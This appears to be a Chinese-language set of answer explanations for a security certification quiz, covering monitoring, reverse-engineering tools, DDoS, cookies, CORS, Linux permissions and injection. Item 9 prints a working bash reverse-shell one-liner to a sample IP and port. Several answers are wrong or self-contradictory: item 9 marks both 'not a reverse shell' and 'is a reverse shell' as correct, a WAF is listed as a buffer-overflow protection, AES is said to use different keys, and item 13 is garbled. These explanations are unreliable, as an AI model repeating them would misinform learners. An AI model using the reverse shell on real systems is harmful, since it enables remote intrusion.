【知识点详解】
1. **系统网络外连行为监控**:
- 查看 `/var/log/lastlog` 记录主要用于追踪用户的登录信息,而非网络连接。
- 使用 `hook` 技术替换 C 库函数 `connect` 可以监控程序的网络连接行为。
- `auditd` 可以监控系统调用,包括 `connect`,从而记录网络连接事件。
- 所以,不能实现对系统网络外连行为监控的是 a. 查看 `/var/log/lastlog` 记录。
2. **逆向分析工具**:
- `Sqlmap` 是一款自动化 SQL 注入工具,不是逆向分析工具。
- `Gdb` 是通用的调试器,可用于逆向工程。
- `IDA` 是反汇编器和调试器,常用于逆向分析。
- `Ollydbg` 是 Windows 平台上的调试器,适合逆向工程。
- 因此,属于逆向分析工具的是 b. Gdb、c. IDA 和 d. Ollydbg。
3. **MD5**:
- MD5 不是加密算法,而是一种哈希算法,选项 b 是正确的。它不可逆,通常用于校验数据完整性和密码存储。
4. **SYNFlood 攻击**:
- SYNFlood 攻击是利用 TCP 三次握手的漏洞,攻击者发送大量 SYN 包,导致服务器资源耗尽,无法处理正常连接。正确答案是 a. 此种攻击方式不需要建立完整的 TCP 三次握手和 c. 此种攻击方式是客户端主动发起 SYN 半连接引起的。
5. **DDoS 攻击类型**:
- DDoS 攻击包括 a. ICMP Flood、b. SYNFlood、c. DNSQuery Flood 和 d. UDPFlood 等。
6. **Cookie 属性**:
- Cookie 的基础属性包括 a. Domain、b. Path、c. HttpOnly、d. Secure 和 e. Expires。
7. **跨域攻击**:
- 跨域攻击可以通过 a. Iframe、c. window.name 和 d. window.postMessage 实现。CORS(跨源资源共享)是允许浏览器向不同源发送请求的机制,而不是产生跨域攻击的方式。
8. **Linux 文件系统权限**:
- 只读权限对应的数值是 a. 4。
9. **反弹 shell 命令**:
- `bash -i >& /dev/tcp/192.168.1.2/8080 0>&1` 是一个反弹 shell 命令,可以将 shell 输出重定向到指定的 IP 和端口。正确答案是 a. 这不是一个反弹 shell 和 c. 这是一个反弹 shell。
10. **缓冲区溢出保护机制**:
- PIE(Position Independent Executable)、NX(No Execute)和 WAF(Web Application Firewall)是缓冲区溢出的保护机制。IPTABLES 是防火墙规则,不属于缓冲区溢出保护。
11. **firmware 分析工具**:
- Binwalk、File 和 firmware-mod-kit 对 firmware 分析有帮助,但 netstat 不是。
12. **加密和散列算法**:
- 错误的说法是 a. RSA 和 DSA 功能一样(它们都是公钥加密算法,但算法不同);b. 3DES 通过增加密钥长度解决了 DES 的问题;c. Hash 不可逆,会导致信息熵增大,不是减小;d. ES 加密和解密使用相同密钥(ES 指的是 AES,是使用不同密钥的)。
13. **数字签名**:
- 错误的说法是 d. 都是1,数字签名包含了确定消息来源、完整性以及公钥验证等。
14. **Linux 可执行文件特征字符串**:
- Linux 可执行文件开头的特征字符串是 c. ELF(Executable and Linkable Format)。
15. **AJAX**:
- 正确的说法是 a. AJAX 可以完成数据的异步跨域通信,但不能直接给不同域发送数据,而是通过服务器代理。
16. **Linux 文件权限设置**:
- 将文件 `myfile` 设置为所有者只读,其余无任何权限的命令是 d. `chmod 400 myfile`。
17. **代码安全**:
- 代码段中的 `lua` 代码存在命令注入漏洞,因为 `url:gsub()` 后的 `wget` 命令直接使用了未验证的用户输入。
18. **CORS**:
- CORS 允许 a. 客户端跨域获取服务器返回数据。
19. **设备升级安全**:
- 使用 `-k` 参数表示忽略 SSL/TLS 证书错误,可能导致安全风险,但不是直接的升级包劫持。
以上是对题目中涉及的 IT 知识点的详细解析,涵盖了网络安全、逆向工程、操作系统、编程安全等多个方面。
